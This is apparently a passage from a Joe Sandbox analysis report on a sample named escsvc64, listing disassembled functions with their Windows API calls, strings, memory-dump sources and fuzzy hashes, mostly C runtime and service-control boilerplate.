__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000000180004B11

Part of subcall function 0000000180006E74: __GetUnwindTryBlock.LIBCMT ref: 0000000180006EB7
Part of subcall function 0000000180006E74: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000000180006EDC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000000180004BE9
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000000180004E37
std::bad_alloc::bad_alloc.LIBCMT ref: 0000000180004F44

Strings

csm, xrefs: 0000000180004C0C
csm, xrefs: 0000000180004B92
csm, xrefs: 0000000180004B2B

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 1c07f995c180fe8b19482931ca148fc83acb38a6c0a0277f61a86655f9e973e5
Instruction ID: 44985bc39f6ce64ecd6a895ba7cc64a1c60f2cc549d2f9bd7a277b4e1fad8b73
Opcode Fuzzy Hash: 1c07f995c180fe8b19482931ca148fc83acb38a6c0a0277f61a86655f9e973e5
Instruction Fuzzy Hash: 3EF1A171518A4C8FEB96EF68C4457E977E0FB58354F10825AF449C7292CF30EA89C786

Function 0000000140005E60 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E7A
GetModuleHandleA.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E98
GetModuleHandleA.KERNEL32 ref: 0000000140005EC5
GetProcAddress.KERNEL32 ref: 0000000140005F18

Strings

.mixcrt, xrefs: 0000000140005EF0
KERNEL32.DLL, xrefs: 0000000140005E91
EncodePointer, xrefs: 0000000140005F0E

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: HandleModule$AddressProcValue
String ID: .mixcrt$EncodePointer$KERNEL32.DLL
API String ID: 2623865758-1746336069
Opcode ID: d62cb1fb803a255d5fbbc31f8e13c3154414141dc766df3b9e4d7561da73de53
Instruction ID: 1ea2a93b65aa6fed410ffae4d9ca497f9c51e7e72b60b0055214cc82254390db
Opcode Fuzzy Hash: d62cb1fb803a255d5fbbc31f8e13c3154414141dc766df3b9e4d7561da73de53
Instruction Fuzzy Hash: 1B216D71611A9182EB9ADB12F8443AA62A1FB8DB95F481025FB8A476B4EF3DC545C700

Function 0000000140005F50 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F70
GetModuleHandleA.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F8B
GetModuleHandleA.KERNEL32 ref: 0000000140005FB2
GetProcAddress.KERNEL32 ref: 0000000140005FF8

Strings

.mixcrt, xrefs: 0000000140005FD0
KERNEL32.DLL, xrefs: 0000000140005F84
DecodePointer, xrefs: 0000000140005FEE

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: HandleModule$AddressProcValue
String ID: .mixcrt$DecodePointer$KERNEL32.DLL
API String ID: 2623865758-2532145718
Opcode ID: e7bb03dee73054b957bffa576d04ca91cbd153297632be51d16cdfd1f33b3ed2
Instruction ID: 94de048c25dcc42fbbcb3b1deb800ddb01b49c7b4c0577e3be6c58809a988402
Opcode Fuzzy Hash: e7bb03dee73054b957bffa576d04ca91cbd153297632be51d16cdfd1f33b3ed2
Instruction Fuzzy Hash: B0215B71300A5185EA56DF27B8843BA62A1FB4DBD5F980025FB4A472B0EF7DC845C710

Function 0000000140005D90 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DB0
GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DCB
GetModuleHandleA.KERNEL32 ref: 0000000140005DF2
GetProcAddress.KERNEL32 ref: 0000000140005E38

Strings

.mixcrt, xrefs: 0000000140005E10
KERNEL32.DLL, xrefs: 0000000140005DC4
EncodePointer, xrefs: 0000000140005E2E

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: HandleModule$AddressProcValue
String ID: .mixcrt$EncodePointer$KERNEL32.DLL
API String ID: 2623865758-1746336069
Opcode ID: d0f9a6bdab863bdcd73823ff862c5cac17ebee37e048433f7763a5d36b9a2943
Instruction ID: 10474dd8a00d39f69b81620e6a70c0b6e39ead194dd7be9fc042b9424ac9d22a
Opcode Fuzzy Hash: d0f9a6bdab863bdcd73823ff862c5cac17ebee37e048433f7763a5d36b9a2943
Instruction Fuzzy Hash: 4A216F71300A9195EA6AEF17F8443AA22A1FB4DBD2F580425FB89472B4EF79C545C700

Function 00451F00 Relevance: 12.3, APIs: 8, Instructions: 297COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00451F28
__scrt_acquire_startup_lock.LIBCMT ref: 00451F7A
_RTC_Initialize.LIBCMT ref: 00451FA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00451FCE
__scrt_release_startup_lock.LIBCMT ref: 00451FF9

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
Instruction ID: 8d53d39933954754376a5d0ce7bf5f3a832d12ddd80edf64ecd2c0ef601a389a
Opcode Fuzzy Hash: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
Instruction Fuzzy Hash: A081D130718A058BD758AB299A4576B32D1EB5A306F44811FED45C3363DBBCD88E878A

Function 0000000180001FD8 Relevance: 12.3, APIs: 8, Instructions: 297COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000000180002000
__scrt_acquire_startup_lock.LIBCMT ref: 0000000180002052
_RTC_Initialize.LIBCMT ref: 0000000180002080
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000001800020A6
__scrt_release_startup_lock.LIBCMT ref: 00000001800020D1

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
Instruction ID: dc10c060f0ea74d2d5e1af32f94848e2a2faa396c4ff80201887d7c9b88c4984
Opcode Fuzzy Hash: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
Instruction Fuzzy Hash: 6A919130618A0D8FF7DAEB6C98457E932D1EB5D380F44C16AB549C3297DE74CA4D8782

Function 000000014000E000 Relevance: 10.7, APIs: 7, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E05A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E079
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E11F
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E179
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E1B2
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E1EF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E22E

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 4108598835e914e00f326557e6f51ea859514b5d8428b88a1ae53d3209862e4c
Instruction ID: 062fe5d0a4023e3a9fcdfe48f18c9f478e5edbb0d365d0ef86478d7369592790
Opcode Fuzzy Hash: 4108598835e914e00f326557e6f51ea859514b5d8428b88a1ae53d3209862e4c
Instruction Fuzzy Hash: 0261A0B2304BC08AE762DF23B9447DA66A5F74C7E8F444225BF6967BE4DB74C5518300

Function 00454EAC Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 461COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0045504A
std::bad_alloc::bad_alloc.LIBCMT ref: 00455373

Strings

csm, xrefs: 00454FF3
csm, xrefs: 00454F91
csm, xrefs: 00455071

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 68eb516bf9c9cba3fb8227e73063fcca90c7209ae9946ac81e4a150aacf18831
Instruction ID: 19c14ba3cfc5a4e99b2e2b299346819b8601142df84b7aaceda3e323c9cb08ab
Opcode Fuzzy Hash: 68eb516bf9c9cba3fb8227e73063fcca90c7209ae9946ac81e4a150aacf18831
Instruction Fuzzy Hash: 6BE1D531918F488FCB14EF28C4916B9B7E0FB5930AF10465EE88587253DB38E589CB86

Function 0000000180004F84 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 461COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000000180005122
std::bad_alloc::bad_alloc.LIBCMT ref: 000000018000544B

Strings

csm, xrefs: 0000000180005069
csm, xrefs: 00000001800050CB
csm, xrefs: 0000000180005149

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 78ca78e43d1c9a3decdd43792cedac3c6e57d46113737bad297a5d37f2058efb
Instruction ID: a904dc7235edeb2451198f4cfbddd28e7b82c3b5ee9ce0e1ec7a6e0abe0cff3a
Opcode Fuzzy Hash: 78ca78e43d1c9a3decdd43792cedac3c6e57d46113737bad297a5d37f2058efb
Instruction Fuzzy Hash: 26F1B331518B4C8BEB96EF28C4817EA77E0FB59345F10865DF48587293DF30A689CB82

Function 000000014000E2A0 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E307
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E31D
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E34B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E3B9
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E46C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E531

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: b59b65d0f1a67b05c39a7111098eaa7419e1de460175b2d3e7c8c0e7f43f5c31
Instruction ID: 168a81da63108cd0b97bed4d09b5aeb46f306b31fbc8593ad063c360c0888773
Opcode Fuzzy Hash: b59b65d0f1a67b05c39a7111098eaa7419e1de460175b2d3e7c8c0e7f43f5c31
Instruction Fuzzy Hash: E181CEB2300A8086EB62DF23A9847E967A5F74CBE8F504615FB69677F4EB78C5058700

Function 000000014000AA50 Relevance: 9.2, APIs: 6, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AAA8
GetLastError.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AABE

Part of subcall function 0000000140003790: HeapAlloc.KERNEL32(?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 00000001400037F1

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AB4E
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000ABF5
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AC0C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AC6B

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 1d7edb17a92f29ba27a9ddb9769f6531d5c5bb9e027f7567b246d935c0cd8161
Instruction ID: 95f027ec94f94ab459c81f74e7744455635649906aa6b246b78c286b6d19a74f
Opcode Fuzzy Hash: 1d7edb17a92f29ba27a9ddb9769f6531d5c5bb9e027f7567b246d935c0cd8161
Instruction Fuzzy Hash: FC617AB23006408AEB66DF26A844BD937E5F74EBE8F480215FB594B7E5DB79C841C340

Function 0000000140006DE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00001000,00000001400037E5,?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 0000000140006DEF
GetProcAddress.KERNEL32(?,?,00001000,00000001400037E5,?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 0000000140006E04
ExitProcess.KERNEL32 ref: 0000000140006E15

Strings

CorExitProcess, xrefs: 0000000140006DFA
mscoree.dll, xrefs: 0000000140006DE8

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 83038e842e64aeba14171e32d07205d5f8d0562140aa5abcf553098547ecfbf7
Instruction ID: 55edfa6310dd0622b2002cc7331f8db003e515954a46d7483bd0e06cf4709e31
Opcode Fuzzy Hash: 83038e842e64aeba14171e32d07205d5f8d0562140aa5abcf553098547ecfbf7
Instruction Fuzzy Hash: 1CE0EC70311B1151FF5B9B62E8943A512666B4D780F081429BA5A4B3B0EEBD840C9300

Function 004542AC Relevance: 7.9, APIs: 5, Instructions: 439COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 004543CF
__AdjustPointer.LIBCMT ref: 0045441A

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 85524f391991ec340317f264c6d2d5d97c9bca659d756e659cf024a3c4dd6266
Instruction ID: 76f57fd6b63c4bba905e11c316f372108bc4d4ed8de678a137f391912bbd476c
Opcode Fuzzy Hash: 85524f391991ec340317f264c6d2d5d97c9bca659d756e659cf024a3c4dd6266
Instruction Fuzzy Hash: 45C11930118E0A9FDB29DF588040276B2D0FBD571BB64466FDC86CB257EA28DCC98789

Function 0000000180004384 Relevance: 7.9, APIs: 5, Instructions: 439COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00000001800044A7
__AdjustPointer.LIBCMT ref: 00000001800044F2

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 6fadff9372363955ae653530a4e92bab46242c9f9ad5856ddd2d2fb6fafb04b9
Instruction ID: 86d43945fb91ae2073277537c466f3923ab9ccee3ff6691bb59e917e620bf1bf
Opcode Fuzzy Hash: 6fadff9372363955ae653530a4e92bab46242c9f9ad5856ddd2d2fb6fafb04b9
Instruction Fuzzy Hash: 92D10572118E0E8FEBEBDB5884413F572D0FB9D391F54C56DB48ACB186EE20DA498385

Function 0000000140008440 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140008466

Part of subcall function 0000000140008A40: Sleep.KERNEL32(?,?,?,00000001400061E3,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140008A90

GetFileType.KERNEL32 ref: 000000014000860C

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: cba840f5acbdaf61da99ed994bd72b21301df9ac7cfb0dfc9d6f44c4c51fbe36
Instruction ID: 9ec098995d62ce09c4685074e2e5a57aa7930796f03975d98b598ac7bf0dcf8a
Opcode Fuzzy Hash: cba840f5acbdaf61da99ed994bd72b21301df9ac7cfb0dfc9d6f44c4c51fbe36
Instruction Fuzzy Hash: 0B91ADB2604B8085EB72CB26E8487993A95F7197B4F254325EFB9473F1EB7AC841C701

Function 0000000140001300 Relevance: 7.6, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

SetServiceStatus.ADVAPI32 ref: 000000014000137A
SetEvent.KERNEL32 ref: 000000014000138C
SetServiceStatus.ADVAPI32 ref: 00000001400013E5
SetServiceStatus.ADVAPI32 ref: 0000000140001437
SetEvent.KERNEL32 ref: 0000000140001449

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ServiceStatus$Event
String ID:
API String ID: 3225596143-0
Opcode ID: d33ebfa21478c44a2b4229f9ec37f48baa9755fe043f6f9d422456950182cdc3
Instruction ID: 267da8374e0204dd645fd918fc07667eae96e170f0cb4894acbc5a21a37544f2
Opcode Fuzzy Hash: d33ebfa21478c44a2b4229f9ec37f48baa9755fe043f6f9d422456950182cdc3
Instruction Fuzzy Hash: 4741B2B49016408BFB67CF6BF880BD47AB4B79C3D8F04811AEA4D8B670DB7A85448B04

Function 0000000140008320 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,000000014000348B), ref: 000000014000832E
GetLastError.KERNEL32(?,?,?,?,?,?,000000014000348B), ref: 000000014000834E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,000000014000348B), ref: 000000014000838B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,000000014000348B), ref: 00000001400083AB

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: e08104ef58c5b7a0e93a651a31a02ccca22a156db734b767f670521c42133e35
Instruction ID: dbc5816ed4fa3de7f18b23a09a72020ca8908b93386790fa4ffafd35d39d8284
Opcode Fuzzy Hash: e08104ef58c5b7a0e93a651a31a02ccca22a156db734b767f670521c42133e35
Instruction Fuzzy Hash: 06315E71615A5082E7628F12B84478A67E0F78DBD0F540125FF898BBB8DB7DC5428B00

Function 000000014000D630 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400091E0), ref: 000000014000D68C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400091E0), ref: 000000014000D6A7

Part of subcall function 000000014000E880: CreateFileA.KERNEL32 ref: 000000014000E8AA

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400091E0), ref: 000000014000D6BC
WideCharToMultiByte.KERNEL32 ref: 000000014000D6ED
WriteConsoleA.KERNEL32 ref: 000000014000D712

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 1212426c9a6d3a13bc232f4aa453472932cbfef3c4738367fd966b73ce934767
Instruction ID: d3d35c4d5cd4b0ecb72ff258d36a5aae06955c4e2a1dc75f7bddf35bfaf35452
Opcode Fuzzy Hash: 1212426c9a6d3a13bc232f4aa453472932cbfef3c4738367fd966b73ce934767
Instruction Fuzzy Hash: 78311C71604A4182EB12DB22F85539673A0F78D7B4F500316FBAD4BAF4DBBAC585CB10

Function 0000000140006240 Relevance: 7.5, APIs: 5, Instructions: 41threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0000000140003B5E), ref: 000000014000624A
FlsGetValue.KERNEL32(?,?,?,0000000140003B5E), ref: 0000000140006258
SetLastError.KERNEL32(?,?,?,0000000140003B5E), ref: 00000001400062B3

Part of subcall function 0000000140008A40: Sleep.KERNEL32(?,?,?,00000001400061E3,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140008A90

FlsSetValue.KERNEL32(?,?,?,0000000140003B5E), ref: 0000000140006284

Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32(00000000,?,?,0000000140006208,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140006046
Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32 ref: 0000000140006089
Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060D8
